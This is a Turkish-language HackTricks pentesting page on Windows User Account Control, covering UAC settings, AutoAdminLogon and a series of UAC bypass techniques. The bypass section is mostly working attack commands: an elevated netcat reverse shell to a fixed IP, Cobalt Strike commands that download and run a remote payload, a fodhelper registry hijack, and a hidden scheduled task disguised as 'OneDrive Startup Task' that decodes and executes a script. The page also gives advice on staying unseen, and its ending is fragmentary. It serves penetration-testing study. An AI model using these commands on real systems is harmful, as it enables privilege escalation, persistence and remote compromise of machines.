UAC - User Account Control

Tip

AWS Hacking’i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE) Azure Hacking’i öğrenin ve pratik yapın: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks'i Destekleyin

• abonelik planlarını kontrol edin!
• 💬 Discord grubuna veya telegram grubuna katılın ya da Twitter’da bizi takip edin 🐦 @hacktricks_live.**
• Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

UAC

User Account Control (UAC) yükseltilmiş işlemler için bir onay istemi (consent prompt) sağlayan bir özelliktir. Uygulamaların farklı integrity seviyeleri vardır ve yüksek seviyeye sahip bir program, sistemi potansiyel olarak tehlikeye atabilecek görevleri yerine getirebilir. UAC etkin olduğunda, uygulamalar ve görevler, bir yönetici bu uygulama/görevlere yönetici düzeyinde erişim vermediği sürece her zaman bir yönetici olmayan hesabın güvenlik bağlamı altında çalışır. Bu, yöneticileri istemeden yapılan değişikliklerden koruyan bir kolaylık özelliğidir fakat bir güvenlik sınırı olarak kabul edilmez.

integrity seviyeleri hakkında daha fazla bilgi için:

Integrity Levels

UAC etkin olduğunda, bir yönetici kullanıcıya 2 token verilir: normal işlemleri yapmak için bir standart kullanıcı anahtarı ve yönetici ayrıcalıklarını içeren bir token.

Bu sayfa UAC’nin nasıl çalıştığını ayrıntılı olarak tartışır ve oturum açma sürecini, kullanıcı deneyimini ve UAC mimarisini içerir. Yöneticiler, UAC’nin kuruluşlarına özgü nasıl çalışacağını yerel düzeyde (secpol.msc kullanarak) yapılandırmak için güvenlik ilkelerini kullanabilir veya Active Directory domain ortamında Group Policy Objects (GPO) aracılığıyla yapılandırıp dağıtabilirler. Çeşitli ayarlar detaylı olarak burada tartışılmaktadır. UAC için ayarlanabilecek 10 Group Policy ayarı vardır. Aşağıdaki tablo ek bilgi sağlar:

Policies for installing software on Windows

Varsayılan olarak yerel güvenlik ilkeleri (çoğu sistemde “secpol.msc”) yönetici olmayan kullanıcıların yazılım yüklemesini engelleyecek şekilde yapılandırılmıştır. Bu, bir yönetici olmayan kullanıcının yazılımınızın yükleyicisini indirebilse bile, yönetici hesabı olmadan çalıştıramayacağı anlamına gelir.

Registry Keys to Force UAC to Ask for Elevation

Yönetici hakları olmayan standart bir kullanıcı olarak, belirli eylemleri gerçekleştirmeye çalıştığında UAC’nin “standart” hesabı kimlik bilgileri istemesini sağlayabilirsiniz. Bu işlem, belirli kayıt defteri anahtarlarını değiştirmeyi gerektirir ve bunlar için yönetici izinlerine ihtiyaç vardır; ta ki bir UAC bypass olmadıkça veya saldırgan zaten yönetici olarak oturum açmamışsa.

Kullanıcı Administrators grubunda olsa bile, bu değişiklikler kullanıcının yönetici işlemleri gerçekleştirmek için hesap kimlik bilgilerini yeniden girmesini zorunlu kılar.

Tek dezavantajı, bu yöntemin çalışması için UAC’nin devre dışı bırakılmasını gerektirmesidir; bu, üretim ortamlarında muhtemel değildir.

Değiştirmeniz gereken kayıt defteri anahtarları ve girdileri aşağıdaki gibidir (parantez içindeki değerler varsayılanlardır):

• HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System:
• ConsentPromptBehaviorUser = 1 (3)
• ConsentPromptBehaviorAdmin = 1 (5)
• PromptOnSecureDesktop = 1 (1)

Bu, Yerel Güvenlik İlkesi (secpol.msc) aracıyla manuel olarak da yapılabilir. Değiştirildikten sonra, yönetici işlemleri kullanıcının kimlik bilgilerini yeniden girmesini ister.

Note

User Account Control bir güvenlik sınırı değildir. Bu nedenle, standart kullanıcılar local privilege escalation exploit olmadan hesaplarından çıkarak yönetici hakları elde edemezler.

Ask for ‘full computer access’ to a user

hostname | Set-Clipboard
Enable-PSRemoting -SkipNetworkProfileCheck -Force

cd C:\Users\hacedorderanas\Desktop
New-PSSession -Name "Case ID: 1527846" -ComputerName hostname
Enter-PSSession -ComputerName hostname

UAC Ayrıcalıkları

• Internet Explorer Protected Mode, yüksek bütünlük düzeyindeki süreçlerin (ör. web tarayıcıları) düşük bütünlük düzeyindeki verilere (ör. geçici Internet dosyaları klasörü) erişmesini önlemek için bütünlük kontrolleri kullanır. Bu, tarayıcının düşük-bütünlük token’ı ile çalıştırılmasıyla sağlanır. Tarayıcı düşük bütünlük bölgesinde saklanan verilere erişmeye çalıştığında işletim sistemi sürecin bütünlük düzeyini kontrol eder ve erişime göre izin verir. Bu özellik, remote code execution saldırılarının sistemdeki hassas verilere erişmesini engellemeye yardımcı olur.
• Bir kullanıcı Windows’a oturum açtığında sistem, kullanıcının ayrıcalıklarının bir listesini içeren bir erişim belirteci oluşturur. Ayrıcalıklar, bir kullanıcının hakları ve yeteneklerinin birleşimi olarak tanımlanır. Belirteç ayrıca kullanıcının bilgisayara ve ağ üzerindeki kaynaklara kimlik doğrulaması için kullanılan kimlik bilgilerini içeren bir liste içerir.

Autoadminlogon

Windows’u belirli bir kullanıcının sistem başlangıcında otomatik olarak oturum açması için yapılandırmak istiyorsanız AutoAdminLogon registry key değerini ayarlayın. Bu, kiosk ortamları veya test amaçları için kullanışlıdır. Parolayı kayıt defterinde açığa çıkardığı için yalnızca güvenli sistemlerde kullanın.

Kayıt Defteri Düzenleyicisi veya reg add kullanarak aşağıdaki anahtarları ayarlayın:

• HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon:
• AutoAdminLogon = 1
• DefaultUsername = username
• DefaultPassword = password

Normal oturum açma davranışına geri dönmek için AutoAdminLogon değerini 0 yapın.

UAC bypass

Tip

Grafiksel olarak hedefe erişiminiz varsa, UAC bypass çok basittir; UAC istemi göründüğünde basitçe “Yes” düğmesine tıklayabilirsiniz

UAC bypass şu durumda gereklidir: UAC etkin, süreciniz orta bütünlük bağlamında çalışıyor ve kullanıcınız administrators grubuna ait.

Belirtmek gerekir ki UAC en yüksek güvenlik seviyesindeyse (Always) diğer seviyelerdeki (Default) durumlara göre atlatmak çok daha zordur.

UAC devre dışı

Eğer UAC zaten devre dışıysa (ConsentPromptBehaviorAdmin 0) şu gibi bir şey kullanarak admin ayrıcalıklarıyla bir reverse shell çalıştırabilirsiniz (yüksek bütünlük düzeyi):

#Put your reverse shell instead of "calc.exe"
Start-Process powershell -Verb runAs "calc.exe"
Start-Process powershell -Verb runAs "C:\Windows\Temp\nc.exe -e powershell 10.10.14.7 4444"

UAC bypass with token duplication

• https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/
• https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html

Çok Temel UAC “bypass” (tam dosya sistemi erişimi)

Eğer Administrators grubunun üyesi bir kullanıcıyla shell’iniz varsa, SMB üzerinden paylaşılan C$’i yerel olarak yeni bir diske bağlayabilir ve dosya sistemi içindeki her şeye erişim elde edebilirsiniz (hatta Administrator kullanıcısının ana klasörüne bile).

Warning

Görünüşe göre bu hile artık çalışmıyor

net use Z: \\127.0.0.1\c$
cd C$

#Or you could just access it:
dir \\127.0.0.1\c$\Users\Administrator\Desktop

UAC bypass with cobalt strike

Cobalt Strike teknikleri, UAC en yüksek güvenlik seviyesine ayarlı değilse çalışır.

# UAC bypass via token duplication
elevate uac-token-duplication [listener_name]
# UAC bypass via service
elevate svc-exe [listener_name]

# Bypass UAC with Token Duplication
runasadmin uac-token-duplication powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
# Bypass UAC with CMSTPLUA COM interface
runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"

Empire ve Metasploit ayrıca UAC’yi bypass etmek için birkaç modüle de sahiptir.

KRBUACBypass

Dokümantasyon ve araç: https://github.com/wh0amitz/KRBUACBypass

UAC bypass exploits

UACME birkaç UAC bypass exploits’in bir derlemesidir. UACME’yi Visual Studio veya msbuild kullanarak derlemeniz gerektiğini unutmayın. Derleme birkaç yürütülebilir dosya oluşturacaktır (ör. Source\Akagi\outout\x64\Debug\Akagi.exe), hangi dosyaya ihtiyacınız olduğunu bilmeniz gerekecek.
Dikkatli olun çünkü bazı bypass’lar bazı diğer programları uyarı penceresi göstermeye zorlayabilir; bu da kullanıcıyı uyarıp bir şeylerin olduğunu fark etmesine neden olabilir.

UACME, her tekniğin hangi build sürümünden itibaren çalışmaya başladığını belirten bilgiyi içerir. Sürümlerinizi etkileyen bir teknik arayabilirsiniz:

PS C:\> [environment]::OSVersion.Version

Major  Minor  Build  Revision
-----  -----  -----  --------
10     0      14393  0

Ayrıca, this sayfasını kullanarak build sürümlerinden Windows sürümü 1607’yi elde edebilirsiniz.

UAC Bypass – fodhelper.exe (Registry hijack)

Güvenilir ikili dosya fodhelper.exe, modern Windows sürümlerinde otomatik olarak yükseltilir. Başlatıldığında, DelegateExecute verb’ünü doğrulamadan aşağıdaki per-user kayıt defteri yolunu sorgular. Oraya bir komut yerleştirmek, bir Medium Integrity işleminin (kullanıcı Administrators grubundaysa) UAC istemi olmadan bir High Integrity süreci başlatmasına olanak sağlar.

Registry path queried by fodhelper:

HKCU\Software\Classes\ms-settings\Shell\Open\command

</details>
Notlar:
- Geçerli kullanıcı Administrators üyesi olduğunda ve UAC seviyesi varsayılan/gevşek olduğunda çalışır (ek kısıtlamalar içeren Always Notify değil).
- 64-bit Windows'ta 32-bit bir süreçten 64-bit `PowerShell` başlatmak için `sysnative` yolunu kullanın.
- Payload herhangi bir komut olabilir (`PowerShell`, `cmd` veya bir EXE yolu). Gizli kalmak için UIs/istem pencereleri açmaktan kaçının.

#### CurVer/extension hijack varyantı (sadece HKCU)

Son örnekler `fodhelper.exe`'yi suistimal ederken `DelegateExecute`'ten kaçınıyor ve bunun yerine kullanıcıya özel `CurVer` değeri aracılığıyla **`ms-settings` ProgID'sini yönlendiriyorlar**. Otomatik yükseltilen binary hâlâ handler'ı `HKCU` altında çözüyor, bu yüzden anahtarları eklemek için admin token gerekmez:
```powershell
# Point ms-settings to a custom extension (.thm) and map that extension to our payload
New-Item -Path "HKCU:\Software\Classes\.thm\Shell\Open" -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Classes\.thm\Shell\Open\command" -Name "(default)" -Value "C:\\ProgramData\\rKXujm.exe" -Force | Out-Null
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings" -Name "CurVer" -Value ".thm" -Force

Start-Process "C:\\Windows\\System32\\fodhelper.exe"   # auto-elevates and runs rKXujm.exe

schtasks /create /sc hourly /tn "OneDrive Startup Task" /rl highest /tr "cmd /c powershell -w hidden $d=[IO.File]::ReadAllBytes('C:\ProgramData\VljE\zVJs.ps1');$k=[Text.Encoding]::UTF8.GetBytes('Q');for($i=0;$i -lt $d.Length;$i++){$d[$i]=$d[$i]-bxor$k[$i%$k.Length]};iex ([Text.Encoding]::UTF8.GetString($d))"

$pid = Invoke-RAiProcessRunOnce
$p = Get-Process -Id $pid
$t = Get-NtToken -Process $p
$id = New-NtTokenDuplicate -Token $t -ImpersonationLevel Identification
Invoke-NtToken $id -ImpersonationLevel Identification { Get-NtDirectory "\??" | Out-Null }
$auth = Get-NtTokenId -Authentication -Token $id
New-NtSymbolicLink "\Sessions\0\DosDevices/$auth/C:" "\??\\C:\\Users\\attacker\\loot"